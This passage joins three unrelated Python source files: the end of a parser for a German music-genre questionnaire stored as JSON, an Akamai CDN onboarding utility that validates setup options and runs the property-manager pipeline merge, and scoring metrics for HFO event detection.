f.write('missing_value_psychedelic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Psychedelic aus?' in q_json:
q_data['psychedelic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Psychedelic aus?'])
else:
f.write('missing_value_psychedelic_know\n')
# read out sortables rock - rocknroll
q_data_rocknroll_sortable = q_json['rocknroll_sortable']
if len(q_data_rocknroll_sortable)==10:
for i in range(0, len(q_json['rocknroll_sortable'])):
q_data['rocknroll_sortable'][i] = str(q_json['rocknroll_sortable'][i])
else:
f.write('missing_value_rocknroll_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (RocknRoll)?' in q_json:
q_data['rocknroll_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (RocknRoll)?'])
else:
f.write('missing_value_rocknroll_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre RocknRoll aus?' in q_json:
q_data['rocknroll_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre RocknRoll aus?'])
else:
f.write('missing_value_rocknroll_know\n')
# read out sortables rock - all
if 'rock' in q_json:
q_data_rock_all = q_json['rock']
if len(q_data_rock_all)==5:
for i in range(0, len(q_json['rock'])):
q_data['rock_all'][i] = str(q_json['rock'][i])
else:
f.write('rock_all_not_complete\n')
else:
f.write('rock_all_missing\n')
## read out sortables african-american
# read out sortables african-american - funk
q_data_funk_sortable = q_json['funk_sortable']
if len(q_data_funk_sortable)==10:
for i in range(0, len(q_json['funk_sortable'])):
q_data['funk_sortable'][i] = str(q_json['funk_sortable'][i])
else:
f.write('missing_value_funk_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Funk)?' in q_json:
q_data['funk_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Funk)?'])
else:
f.write('missing_value_funk_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Funk aus?' in q_json:
q_data['funk_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Funk aus?'])
else:
f.write('missing_value_funk_know\n')
# read out sortables african-american - hiphop
q_data_hiphop_sortable = q_json['hiphop_sortable']
if len(q_data_hiphop_sortable)==10:
for i in range(0, len(q_json['hiphop_sortable'])):
q_data['hiphop_sortable'][i] = str(q_json['hiphop_sortable'][i])
else:
f.write('missing_value_hiphop_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Hiphop)?' in q_json:
q_data['hiphop_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Hiphop)?'])
else:
f.write('missing_value_hiphop_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Hiphop aus?' in q_json:
q_data['hiphop_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Hiphop aus?'])
else:
f.write('missing_value_hiphop_know\n')
# read out sortables african-american - reggae
q_data_reggae_sortable = q_json['reggae_sortable']
if len(q_data_reggae_sortable)==10:
for i in range(0, len(q_json['reggae_sortable'])):
q_data['reggae_sortable'][i] = str(q_json['reggae_sortable'][i])
else:
f.write('missing_value_reggae_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Reggae)?' in q_json:
q_data['reggae_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Reggae)?'])
else:
f.write('missing_value_reggae_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Reggae aus?' in q_json:
q_data['reggae_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Reggae aus?'])
else:
f.write('missing_value_reggae_know\n')
# read out sortables african-american - rnb
q_data_rnb_sortable = q_json['rnb_sortable']
if len(q_data_rnb_sortable)==10:
for i in range(0, len(q_json['rnb_sortable'])):
q_data['rnb_sortable'][i] = str(q_json['rnb_sortable'][i])
else:
f.write('missing_value_rnb_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (RnB)?' in q_json:
q_data['rnb_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (RnB)?'])
else:
f.write('missing_value_rnb_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre RnB aus?' in q_json:
q_data['rnb_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre RnB aus?'])
else:
f.write('missing_value_rnb_know\n')
# read out sortables african-american - soul
q_data_soul_sortable = q_json['soul_sortable']
if len(q_data_soul_sortable)==10:
for i in range(0, len(q_json['soul_sortable'])):
q_data['soul_sortable'][i] = str(q_json['soul_sortable'][i])
else:
f.write('missing_value_soul_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Soul)?' in q_json:
q_data['soul_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Soul)?'])
else:
f.write('missing_value_soul_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Soul aus?' in q_json:
q_data['soul_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Soul aus?'])
else:
f.write('missing_value_soul_know\n')
# read out sortables african-american - all
if 'african_american' in q_json:
q_data_african_american_all = q_json['african_american']
if len(q_data_african_american_all)==5:
for i in range(0, len(q_json['african_american'])):
q_data['african_american_all'][i] = str(q_json['african_american'][i])
else:
f.write('african_american_all_not_complete\n')
else:
f.write('african_american_all_missing\n')
## read out sortables classic
# read out sortables classic - baroque
q_data_baroque_sortable = q_json['baroque_sortable']
if len(q_data_baroque_sortable)==10:
for i in range(0, len(q_json['baroque_sortable'])):
q_data['baroque_sortable'][i] = str(q_json['baroque_sortable'][i])
else:
f.write('missing_value_baroque_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Barock)?' in q_json:
q_data['baroque_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Barock)?'])
else:
f.write('missing_value_baroque_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Barock aus?' in q_json:
q_data['baroque_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Barock aus?'])
else:
f.write('missing_value_baroque_know\n')
# read out sortables classic - viennese_classic
q_data_viennese_classic_sortable = q_json['viennese_classic_sortable']
if len(q_data_viennese_classic_sortable)==10:
for i in range(0, len(q_json['viennese_classic_sortable'])):
q_data['viennese_classic_sortable'][i] = str(q_json['viennese_classic_sortable'][i])
else:
f.write('missing_value_viennese_classic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Wiener Klassik)?' in q_json:
q_data['viennese_classic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Wiener Klassik)?'])
else:
f.write('missing_value_viennese_classic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Wiener Klassik aus?' in q_json:
q_data['viennese_classic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Wiener Klassik aus?'])
else:
f.write('missing_value_viennese_classic_know\n')
# read out sortables classic - modernclassic
q_data_modern_classic_sortable = q_json['modernclassic_sortable']
if len(q_data_modern_classic_sortable)==10:
for i in range(0, len(q_json['modernclassic_sortable'])):
q_data['modern_classic_sortable'][i] = str(q_json['modernclassic_sortable'][i])
else:
f.write('missing_value_modern_classic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Moderne Klassik)?' in q_json:
q_data['modern_classic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Moderne Klassik)?'])
else:
f.write('missing_value_modern_classic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Moderne Klassik aus?' in q_json:
q_data['modern_classic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Moderne Klassik aus?'])
else:
f.write('missing_value_modern_classic_know\n')
# read out sortables classic - renaissance
q_data_renaissance_sortable = q_json['renaissance_sortable']
if len(q_data_renaissance_sortable)==10:
for i in range(0, len(q_json['renaissance_sortable'])):
q_data['renaissance_sortable'][i] = str(q_json['renaissance_sortable'][i])
else:
f.write('missing_value_renaissance_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Renaissance Musik)?' in q_json:
q_data['renaissance_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Renaissance Musik)?'])
else:
f.write('missing_value_renaissance_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Renaissance Musik aus?' in q_json:
q_data['renaissance_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Renaissance Musik aus?'])
else:
f.write('missing_value_renaissance_know\n')
# read out sortables classic - romantic
q_data_romantic_sortable = q_json['romantic_sortable']
if len(q_data_romantic_sortable)==10:
for i in range(0, len(q_json['romantic_sortable'])):
q_data['romantic_sortable'][i] = str(q_json['romantic_sortable'][i])
else:
f.write('missing_value_romantic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Romantik)?' in q_json:
q_data['romantic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Romantik)?'])
else:
f.write('missing_value_romantic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Musik der Romantik aus?' in q_json:
q_data['romantic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Musik der Romantik aus?'])
else:
f.write('missing_value_romantic_know\n')
# read out sortables classic - all
if 'classic' in q_json:
q_data_classic_all = q_json['classic']
if len(q_data_classic_all)==5:
for i in range(0, len(q_json['classic'])):
q_data['classic_all'][i] = str(q_json['classic'][i])
else:
f.write('classic_all_not_complete\n')
else:
f.write('classic_all_missing\n')
## read out sortables electro
# read out sortables electro - deephouse
q_data_deephouse_sortable = q_json['deephouse_sortable']
if len(q_data_deephouse_sortable)==10:
for i in range(0, len(q_json['deephouse_sortable'])):
q_data['deephouse_sortable'][i] = str(q_json['deephouse_sortable'][i])
else:
f.write('missing_value_deephouse_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Deep House)?' in q_json:
q_data['deephouse_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Deep House)?'])
else:
f.write('missing_value_deephouse_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Deep House aus?' in q_json:
q_data['deephouse_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Deep House aus?'])
else:
f.write('missing_value_deephouse_know\n')
# read out sortables electro - drumnbass
q_data_drumnbass_sortable = q_json['drumnbass_sortable']
if len(q_data_drumnbass_sortable)==10:
for i in range(0, len(q_json['drumnbass_sortable'])):
q_data['drumnbass_sortable'][i] = str(q_json['drumnbass_sortable'][i])
else:
f.write('missing_value_drumnbass_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (DrumnBass)?' in q_json:
q_data['drumnbass_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (DrumnBass)?'])
else:
f.write('missing_value_drumnbass_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre DrumnBass aus?' in q_json:
q_data['drumnbass_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre DrumnBass aus?'])
else:
f.write('missing_value_drumnbass_know\n')
# read out sortables electro - dubstep
q_data_dubstep_sortable = q_json['dubstep_sortable']
if len(q_data_dubstep_sortable)==10:
for i in range(0, len(q_json['dubstep_sortable'])):
q_data['dubstep_sortable'][i] = str(q_json['dubstep_sortable'][i])
else:
f.write('missing_value_dubstep_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Dubstep)?' in q_json:
q_data['dubstep_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Dubstep)?'])
else:
f.write('missing_value_dubstep_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Dubstep aus?' in q_json:
q_data['dubstep_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Dubstep aus?'])
else:
f.write('missing_value_dubstep_know\n')
# read out sortables electro - techno
q_data_techno_sortable = q_json['techno_sortable']
if len(q_data_techno_sortable)==10:
for i in range(0, len(q_json['techno_sortable'])):
q_data['techno_sortable'][i] = str(q_json['techno_sortable'][i])
else:
f.write('missing_value_techno_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Techno)?' in q_json:
q_data['techno_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Techno)?'])
else:
f.write('missing_value_techno_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Techno aus?' in q_json:
q_data['techno_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Techno aus?'])
else:
f.write('missing_value_techno_know\n')
# read out sortables electro - trance
q_data_trance_sortable = q_json['trance_sortable']
if len(q_data_trance_sortable)==10:
for i in range(0, len(q_json['trance_sortable'])):
q_data['trance_sortable'][i] = str(q_json['trance_sortable'][i])
else:
f.write('missing_value_trance_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Trance)?' in q_json:
q_data['trance_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Trance)?'])
else:
f.write('missing_value_trance_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Trance aus?' in q_json:
q_data['trance_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Trance aus?'])
else:
f.write('missing_value_trance_know\n')
# read out sortables electro - all
if 'electro' in q_json:
q_data_electro_all = q_json['electro']
if len(q_data_electro_all)==5:
for i in range(0, len(q_json['electro'])):
q_data['electro_all'][i] = str(q_json['electro'][i])
else:
f.write('electro_all_not_complete\n')
else:
f.write('electro_all_missing\n')
### save data frame to csv
# read out id
id=str(json_file.split('ergebnisstring_', 1)[1].split('.json',1)[0])
# assign id
q_data['id']=id
q_data.to_csv('data_questionnaire_' + id + '.csv')
return q_data
f.close()
|
from shutil import which
import subprocess
import json
from urllib import parse
import os
from distutils.dir_util import copy_tree
import shutil
import os
class utility(object):
def __init__(self):
"""
Function to initialize a common status indicator,
This variable should be updated by every function
defined in validation modules to indicate validation status.
This avoid usage of too many IF Conditions.
"""
#Initialize the variable to true
self.valid = True
def installedCommandCheck(self, command_name):
"""
Function to check installation of a command.
"""
if which(command_name) is None:
#This is a failure state, if the command is installed
print('\nThis program needs ' + command_name + ' as a pre-requisite')
if command_name == 'akamai':
print('Please install from https://github.com/akamai/cli')
else:
#Default print statement
print('\n' + command_name + ' is not installed')
#Common assignment for Failure cases
self.valid = False
exit(-1)
return self.valid
else:
#This is a success state, if the command is installed
return self.valid
#Default Return, ideally code shouldnt come here
return self.valid
def executeCommand(self, command):
"""
Function to execute Linux commands
"""
childprocess = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = childprocess.communicate()
if 'pipeline' in command:
if 'akamai [global flags]' in str(stdout):
#Check specifically for akamai pipeline
print('\nThis program needs akamai CLI module property-manager as a pre-requisite')
print('Please install from https://github.com/akamai/cli-property-manager')
#Common assignment for Failure cases
self.valid = False
exit(-1)
return self.valid
else:
return self.valid
#Default Return, ideally code shouldnt come here
return self.valid
def checkPermissions(self, session, apicalls_wrapper_object):
"""
Function to check credentials permissions required
"""
#This function is not used. Helpful in future if we want to check permissions of credential
credential_details_response = apicalls_wrapper_object.checkAuthorization(session)
print(json.dumps(credential_details_response.json(), indent=4))
if credential_details_response.status_code == 200:
for scope in credential_details_response.json()['scope'].split(" "):
o = parse.urlparse(scope)
apis = o.path.split("/")
print('{0:35} {1:10}'.format(apis[3], apis[5]))
else:
pass
#Default Return, ideally code shouldnt come here
return self.valid
def validateSetupSteps(self, session, onboard_object, wrapper_object):
"""
Function to validate the input values of setup.json
"""
if onboard_object.secure_network != 'ENHANCED_TLS' and onboard_object.secure_network != 'STANDARD_TLS':
print('ERROR: secure_network must be either ENHANCED_TLS or STANDARD_TLS')
self.valid = False
return False
if onboard_object.use_file is True and onboard_object.use_folder is True:
print('ERROR: Both use_file and use_folder cannot be set to true')
self.valid = False
return False
if onboard_object.use_file is not True and onboard_object.use_folder is not True:
print('ERROR: Either use_file or use_folder must be set to true')
self.valid = False
return False
if onboard_object.create_new_cpcode is True:
if onboard_object.new_cpcode_name == "":
print('ERROR: If create_new_cpcode is true, new_cpcode_name must be specified')
self.valid = False
if onboard_object.use_file is True:
if onboard_object.source_template_file == "":
print('ERROR: If use_file is true, source_template_file must be specified')
self.valid = False
if onboard_object.source_values_file == "":
print('ERROR: If use_file is true, source_values_file must be specified')
self.valid = False
if onboard_object.use_folder is True:
if onboard_object.folder_path == "":
print('ERROR: If use_folder is true, folder_path must be specified')
self.valid = False
if onboard_object.env_name == "":
print('ERROR: If use_folder is true, env_name must be specified')
self.valid = False
if onboard_object.activate_property_production is True:
if onboard_object.activate_property_staging is not True:
print('ERROR: Must activate property to STAGING before activating to PRODUCTION')
self.valid = False
else:
pass
if onboard_object.add_selected_host is True:
if onboard_object.activate_property_staging is not True:
print('ERROR: If adding WAF selected hosts, property must be activated to STAGING')
self.valid = False
else:
pass
if onboard_object.update_match_target is True:
if onboard_object.activate_property_staging is not True:
print('ERROR: If adding WAF match target, property must be activated to STAGING')
self.valid = False
else:
pass
if onboard_object.update_match_target is True:
if onboard_object.add_selected_host is not True:
print('ERROR: If adding WAF match target, must be added to WAF selected hosts')
self.valid = False
else:
pass
if onboard_object.activate_waf_policy_staging is True:
if onboard_object.add_selected_host is not True:
print('ERROR: If activating WAF policy to STAGING, must at least add WAF selected hosts')
self.valid = False
else:
pass
if onboard_object.activate_waf_policy_production is True:
if onboard_object.activate_waf_policy_staging is not True:
print('ERROR: Must activate WAF policy to STAGING before activating to PRODUCTION.')
self.valid = False
else:
pass
#Check if product_id is valid for contract
print('Checking if valid product_id: ' + onboard_object.product_id)
product_detail = self.validateProductId(session, wrapper_object, onboard_object.contract_id, onboard_object.product_id)
if product_detail['Found'] is True:
print('Confirmed valid product_id')
else:
print('ERROR: Invalid product_id for contract: ' + onboard_object.contract_id)
print('ERROR: Please select from valid product_ids for this contract: ' + str(product_detail['products']))
self.valid = False
if onboard_object.edge_hostname_mode == 'use_existing_edgehostname':
if self.valid:
print('\nedge_hostname_mode = use_existing_edgehostname\n')
if onboard_object.edge_hostname == "":
print('ERROR: If use_existing_edgehostname, edge_hostname is mandatory')
self.valid = False
else:
if onboard_object.secure_network == 'ENHANCED_TLS':
if not str(onboard_object.edge_hostname).endswith('edgekey.net'):
print('ERROR: If secure_network is ENHANCED_TLS, existing edge_hostname must end with edgekey.net')
self.valid = False
return False
elif onboard_object.secure_network == 'STANDARD_TLS':
if not str(onboard_object.edge_hostname).endswith('edgesuite.net'):
print('ERROR: If secure_network is STANDARD_TLS, existing edge_hostname must end with edgesuite.net')
self.valid = False
return False
#Validate edgehostname and validate the necessary
if self.valid:
#Check the validity of edgehostname
print('Checking if valid edge_hostname: ' + str(onboard_object.edge_hostname))
ehn_id = self.validateEdgeHostnameExists(session, wrapper_object, str(onboard_object.edge_hostname))
if ehn_id > 0:
print('Confirmed valid edge_hostname: ehn_' + str(ehn_id))
onboard_object.edge_hostname_id = ehn_id
else:
print('ERROR: edge_hostname is not found')
self.valid = False
if onboard_object.edge_hostname_mode == 'new_standard_tls_edgehostname':
print('\nedge_hostname_mode = new_standard_tls_edgehostname\n')
if onboard_object.secure_network != 'STANDARD_TLS':
print('ERROR: For new_standard_tls_edgehostname, secure_network must be STANDARD_TLS')
self.valid = False
return False
if onboard_object.edge_hostname_mode == 'new_enhanced_tls_edgehostname':
print('\nedge_hostname_mode = new_enhanced_tls_edgehostname\n')
if onboard_object.secure_network != 'ENHANCED_TLS':
print('ERROR: For new_enhanced_tls_edgehostname, secure_network must be ENHANCED_TLS')
self.valid = False
return False
if onboard_object.use_existing_enrollment_id is True:
if onboard_object.create_new_ssl_cert is True:
print('ERROR: Both use_existing_enrollment_id and create_new_ssl_cert cannot be set to true')
self.valid = False
if onboard_object.existing_enrollment_id == "":
print('ERROR: If use_existing_enrollment_id is true, existing_enrollment_id is mandatory')
self.valid = False
if onboard_object.existing_slot_number == "":
print('ERROR: If use_existing_enrollment_id is true, existing_slot_number is mandatory')
self.valid = False
elif onboard_object.create_new_ssl_cert is True:
if onboard_object.temp_existing_edge_hostname == "":
print('ERROR: If create_new_ssl_cert is true, temp_existing_edge_hostname must be specified')
self.valid = False
else:
if onboard_object.secure_network == 'ENHANCED_TLS':
if not str(onboard_object.temp_existing_edge_hostname).endswith('edgekey.net'):
print('ERROR: If secure_network is ENHANCED_TLS, temp_existing_edge_hostname must end with edgekey.net')
self.valid = False
return False
if onboard_object.ssl_cert_template_file is None or onboard_object.ssl_cert_template_values is None:
print('ERROR: If create_new_ssl_cert is true, ssl_cert_template_file and ssl_cert_template_values must be specified')
self.valid = False
if self.validateFile(onboard_object.ssl_cert_template_file):
if self.validateFile(onboard_object.ssl_cert_template_values):
pass
else:
#File does not exist
print('ERROR: ' + onboard_object.ssl_cert_template_values + ' does not exist')
self.valid = False
else:
#File does not exist
print('ERROR: ' + onboard_object.ssl_cert_template_file + ' does not exist')
self.valid = False
#Validate the temp_existing_edge_hostname
if self.valid:
print('Checking if valid temp_existing_edge_hostname: ' + str(onboard_object.temp_existing_edge_hostname))
ehn_id = self.validateEdgeHostnameExists(session, wrapper_object, str(onboard_object.temp_existing_edge_hostname))
if ehn_id > 0:
print('Confirmed valid temp_existing_edge_hostname: ehn_' + str(ehn_id))
onboard_object.edge_hostname_id = ehn_id
else:
print('ERROR: temp_existing_edge_hostname is not found')
self.valid = False
if onboard_object.use_file is True:
if self.validateFile(onboard_object.source_template_file):
if self.validateFile(onboard_object.source_values_file):
pass
else:
#File does not exist
print('ERROR: ' + onboard_object.source_values_file + ' does not exist')
self.valid = False
else:
#File does not exist
print('ERROR: ' + onboard_object.source_template_file + ' does not exist')
self.valid = False
#If supposed to something with WAF, can we find waf_config_id for the specifed name
if onboard_object.add_selected_host is True:
print('\nChecking if valid waf_config_name: ' + onboard_object.waf_config_name)
config_detail = self.getWafConfigIdByName(session, wrapper_object,onboard_object.waf_config_name)
if config_detail['Found'] is True:
onboard_object.onboard_waf_config_id = config_detail['details']['id']
print('Found valid waf_config_id: ' + str(onboard_object.onboard_waf_config_id))
onboard_object.onboard_waf_prev_version = config_detail['details']['latestVersion']
else:
print('ERROR: Unable to find valid waf configuration for waf_config_name: ' + onboard_object.waf_config_name)
self.valid = False
#Default Return, only use this return as every settings needs to be checked
return self.valid
#Validate file
def validateFile(self, file_location):
if os.path.isfile(file_location):
return True
else:
return False
def validateProductId(self, session, wrapper_object, contract_id, product_id):
"""
Function to validate product ids for a contract
"""
products = dict()
products['Found'] = False
products['products'] = []
get_products_response = wrapper_object.getProductsByContract(session, contract_id)
if get_products_response.status_code == 200:
items = get_products_response.json()['products']['items']
for each_item in items:
if 'productId' in each_item:
if each_item['productId'].lower() == product_id.lower():
products['Found'] = True
products['products'].append(each_item['productId'])
else:
pass
else:
print(json.dumps(get_products_response.json(), indent=4))
pass
return products
def validateEdgeHostnameExists(self, session, wrapper_object, edge_hostname):
"""
Function to validate edge hostname
"""
ehn_id = 0
edgehostname_response = wrapper_object.checkEdgeHostname(session, edge_hostname)
record_name = edge_hostname
if str(edge_hostname).endswith('edgekey.net'):
record_name = str(edge_hostname).split('.edgekey.net')[0]
elif str(edge_hostname).endswith('edgesuite.net'):
record_name = str(edge_hostname).split('.edgesuite.net')[0]
if edgehostname_response.status_code == 200:
ehns = edgehostname_response.json()['edgeHostnames']
for every_ehn in ehns:
if every_ehn['recordName'] == record_name:
ehn_id = every_ehn['edgeHostnameId']
return ehn_id
else:
pass
else:
print(json.dumps(edgehostname_response.json(), indent=4))
return 0
return ehn_id
def getWafConfigIdByName(self, session, wrapper_object, config_name):
"""
Function to get WAF config ID and version
"""
config_detail = dict()
config_detail['Found'] = False
waf_configs_response = wrapper_object.getWafConfigurations(session)
if waf_configs_response.status_code == 200:
configurations = waf_configs_response.json()['configurations']
for each_config in configurations:
if 'name' in each_config:
if each_config['name'] == config_name:
config_detail['Found'] = True
config_detail['details'] = each_config
else:
pass
else:
pass
else:
pass
return config_detail
def doCliPipelineMerge(self, onboard_object, create_mode=True, merge_type="pm"):
"""
Function to use Akamai property-manager CLI and merge template
"""
#For PM merge, it will use temp_pm folder
#For CPS merge, it will use temp_cps folder
#Delete these folders if they exist to start
FILE = open('command_output', 'w')
if os.path.exists('temp_pm'):
shutil.rmtree('temp_pm')
if os.path.exists('temp_cps'):
shutil.rmtree('temp_cps')
try:
os.remove('devops.log')
except:
pass
try:
os.remove('devops-logs.log')
except:
pass
try:
if create_mode:
#Build projectInfo contents
projectInfo = dict(environments = ['test'], name = 'temp_' + merge_type)
#Create pipeline specific folders are files
if not os.path.exists(os.path.join('temp_' + merge_type,'dist')):
os.makedirs(os.path.join('temp_' + merge_type,'dist'))
if not os.path.exists(os.path.join('temp_' + merge_type,'environments','test')):
os.makedirs(os.path.join('temp_' + merge_type,'environments','test'))
if not os.path.exists(os.path.join('temp_' + merge_type,'templates')):
os.makedirs(os.path.join('temp_' + merge_type,'templates'))
with open(os.path.join('temp_' + merge_type,'projectInfo.json'),'w') as projectFile:
projectFile.write(json.dumps(projectInfo, indent=4))
#Create main.json with contents of templateContent
with open(onboard_object.source_template_file,'r') as templateHandler:
templateData = json.load(templateHandler)
with open(os.path.join('temp_' + merge_type,'templates','main.json'),'w') as mainContentHandler:
mainContentHandler.write(json.dumps(templateData, indent=4))
#create values file for test env from variables
with open(onboard_object.source_values_file,'r') as valuesHandler, \
open(os.path.join('temp_' + merge_type,'environments','test','variables.json'),'w') as testValuesHandler:
value_json = valuesHandler.read()
testValuesHandler.write(value_json)
#prepare the variable definitions file contents
varDefinitions = {}
varDefinitions['definitions'] = {}
for eachKey in json.loads(value_json).keys():
varDefinitions['definitions'][eachKey] = {}
varDefinitions['definitions'][eachKey]['default'] = ""
varDefinitions['definitions'][eachKey]['type'] = "userVariableValue"
with open(os.path.join('temp_' + merge_type,'environments','variableDefinitions.json'),'w') as definitionHandler:
definitionHandler.write(json.dumps(varDefinitions, indent=4))
#Create envInfo.json else it will error out
testEnvInfo = dict(name = "test")
with open(os.path.join('temp_' + merge_type,'environments','test','envInfo.json'),'w') as testValuesHandler:
testValuesHandler.write(json.dumps(testEnvInfo, indent=4))
#Run pipeline merge
if merge_type == "pm":
command = ['akamai', 'pipeline', 'merge', '-n', '-p', 'temp_pm', 'test', '--edgerc', onboard_object.edgerc, '--section', onboard_object.section]
child_process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = child_process.communicate()
rtn_code = child_process.returncode
else:
command = ['akamai', 'pipeline', 'merge', '-n', '-p', 'temp_cps', 'test', '--edgerc', onboard_object.edgerc, '--section', onboard_object.section]
child_process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = child_process.communicate()
rtn_code = child_process.returncode
else:
#Copy the folder and run pipeline merge
copy_tree(onboard_object.folder_path, 'temp_pm')
command = ['akamai', 'pipeline', 'merge', '-n', '-p', 'temp_pm', '--edgerc', onboard_object.edgerc, '--section', onboard_object.section]
child_process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout,stderr = child_process.communicate()
rtn_code = child_process.returncode
#if pipeline merge command was not successful, return false
if rtn_code != 0:
print('\n Merging the template file failed')
return False
#process call worked, return true
return True
except Exception as e:
print(e)
print('\nERROR: Exception occurred while trying to merge. Check devops-logs.log and/or temp_* folder to see if files were copied or merged correctly')
return False
|
<gh_stars>1-10
import numpy as np
import pandas as pd
from mne_hfo.posthoc import match_detected_annotations
from mne_hfo.sklearn import _convert_y_sklearn_to_annot_df
from mne_hfo.utils import _check_df
def true_positive_rate(y, y_pred):
"""
Calculate true positive rate as: tpr = tp / (tp + fn).
Parameters
----------
y : pd.DataFrame
Event Dataframe with actual labels
y_pred : pd.DataFrame
Event Dataframe with predicted labels
Returns
-------
float
"""
tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
# return actual metric
return tp / (tp + fn)
def precision(y, y_pred):
"""
Calculate precision as: precision = tp / (tp + fp).
Parameters
----------
y : pd.DataFrame
Event Dataframe with actual labels
y_pred : pd.DataFrame
Event Dataframe with predicted labels
Returns
-------
float
"""
tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
if tp == 0:
return 0.
# return actual metric
return tp / (tp + fp)
def false_negative_rate(y, y_pred):
"""
Calculate false negative rate as: fnr = fn / (fn + tp).
Parameters
----------
y : pd.DataFrame
Event Dataframe with actual labels
y_pred : pd.DataFrame
Event Dataframe with predicted labels
Returns
-------
float
"""
tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
# return actual metric
return fn / (fn + tp)
def false_discovery_rate(y, y_pred):
"""
Calculate false positive rate as: fdr = fp / (fp + tp).
Parameters
----------
y : pd.DataFrame
Event Dataframe with actual labels
y_pred : pd.DataFrame
Event Dataframe with predicted labels
Returns
-------
float
"""
tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
if fp == 0.:
return 0.
# return the actual metric
return fp / (fp + tp)
def accuracy(y, y_pred):
"""
Calculate accuracy as: accuracy = tp / (tp + fp + fn).
Follows usual formula for accuracy:
accuracy = (tp + tn) / (tp + tn + fp + fn)
but assumes tn = 0.
Parameters
----------
y : pd.DataFrame
Annotation Dataframe with actual labels
y_pred : pd.DataFrame
Annotation Dataframe with predicted labels
Returns
-------
float
"""
tp, fp, fn = _compute_score_data(y, y_pred, method='match-total')
# return actual metric
return tp / (tp + fp + fn)
def _compute_score_data(y, y_pred, method):
"""Compute basic HFO scoring metrics."""
if isinstance(y, pd.DataFrame):
y = _check_df(y, df_type='annotations')
else:
# assume y is now in the form of list of (onset, offset) per channel
y = _convert_y_sklearn_to_annot_df(y)
if isinstance(y_pred, pd.DataFrame):
y_pred = _check_df(y_pred, df_type='annotations')
else:
# assume y is now in the form of list of (onset, offset) per channel
y_pred = _convert_y_sklearn_to_annot_df(y_pred)
